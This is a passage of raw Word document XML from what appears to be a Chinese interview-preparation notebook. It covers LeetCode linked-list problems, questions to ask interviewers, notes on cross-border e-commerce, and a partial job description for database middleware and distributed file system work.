          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3423285" cy="2143125"/>
            <wp:effectExtent l="19050" t="0" r="5715" b="0"/>
            <wp:docPr id="278" name="图片 13" descr="java消息队列使用场景 - 私人频道 - 金色年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java消息队列使用场景 - 私人频道 - 金色年华"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId318" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3423285" cy="2143125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRPr="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3204210" cy="2677160"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="279" name="图片 16" descr="java消息队列使用场景 - 私人频道 - 金色年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java消息队列使用场景 - 私人频道 - 金色年华"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId319" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3204210" cy="2677160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00561489" w:rsidRDefault="00561489" w:rsidP="00561489">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leetcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00561489" w:rsidRDefault="00561489" w:rsidP="00561489">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E12FDB" w:rsidRDefault="00561489" w:rsidP="00E12FDB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:hyperlink r:id="rId320" w:history="1">
        <w:r w:rsidR="00E12FDB" w:rsidRPr="00E12FDB">
          <w:t>Merging two Sorted Singly Linked List</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00561489" w:rsidRPr="00F41A4C" w:rsidRDefault="00E52CCB" w:rsidP="004D230A">
      <w:r w:rsidRPr="00E52CCB">
        <w:t>http://stackoverflow.com/questions/10707352/interview-merging-two-sorted-singly-linked-list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00561489" w:rsidRPr="00561489" w:rsidRDefault="00EA20D2" w:rsidP="00EA20D2">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005E19CD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005E19CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">O(N lgK) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时间内合并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个有序链表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRPr="00561489" w:rsidRDefault="00584459" w:rsidP="00B339FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F591A" w:rsidRPr="00F41A4C" w:rsidRDefault="007F591A" w:rsidP="007F591A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>项目可能会问道的问题？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F591A" w:rsidRPr="007F591A" w:rsidRDefault="007F591A" w:rsidP="00B339FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00724A9D" w:rsidRDefault="007F591A" w:rsidP="00724A9D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00724A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00724A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00724A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>您有想问的问题吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00724A9D" w:rsidRPr="00D83BA0" w:rsidRDefault="001922DF" w:rsidP="00CF2DA4">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D83BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>你怎样形容这家公司的企业文化？</w:t>
      </w:r>
      <w:r w:rsidR="008073B8" w:rsidRPr="008073B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>您认为这儿的气氛如何</w:t>
      </w:r>
      <w:r w:rsidR="008073B8" w:rsidRPr="008073B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
      <w:r w:rsidRPr="008073B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D83BA0" w:rsidRPr="00D83BA0" w:rsidRDefault="00D83BA0" w:rsidP="008073B8">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D83BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>能给我多讲讲招聘程序吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED1559" w:rsidRDefault="00DF28B0" w:rsidP="008073B8">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B7921">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B7921">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>你的工作中最有趣的部分是什么？最有挑战的又是什么？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00722A7C" w:rsidRPr="008B7921" w:rsidRDefault="004C3570" w:rsidP="008073B8">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参加面试我觉得最大收获，了解一些我的表现怎么样，有哪些地方还需要改进的吗，各位老师不吝赐教啊</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005261ED" w:rsidRPr="00F41A4C" w:rsidRDefault="005261ED" w:rsidP="00246709">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>跨境电商想法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005261ED" w:rsidRPr="00F41A4C" w:rsidRDefault="005261ED" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="0019567E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与天猫对比</w:t>
      </w:r>
      <w:r w:rsidR="00F87689" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，追求品质</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="0019567E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>很多人</w:t>
      </w:r>
      <w:r w:rsidR="00F87689" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>不关注价格，节约时间，去国外麻烦，有这个一个平台，价格合理，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="0019567E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>国家支持，促进产品合理的竞争</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="0019567E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>靠谱信任平台，一定程度上打击走私、代购</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="0019567E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>合法合理平台，避免造成的伤害。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="00516489" w:rsidP="0019567E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>年轻人用的比较多</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C079B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00C079B7" w:rsidP="0019567E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C079B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00C079B7" w:rsidP="0019567E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C079B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00C079B7" w:rsidP="00C079B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>岗位描述：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C079B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00C079B7" w:rsidP="00C079B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、数据库中间件，如分库分表、读写分离等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C079B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00C079B7" w:rsidP="00C079B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> PB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>级</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>分布式文件系统研发</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C079B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00C079B7" w:rsidP="00C079B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="777777"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
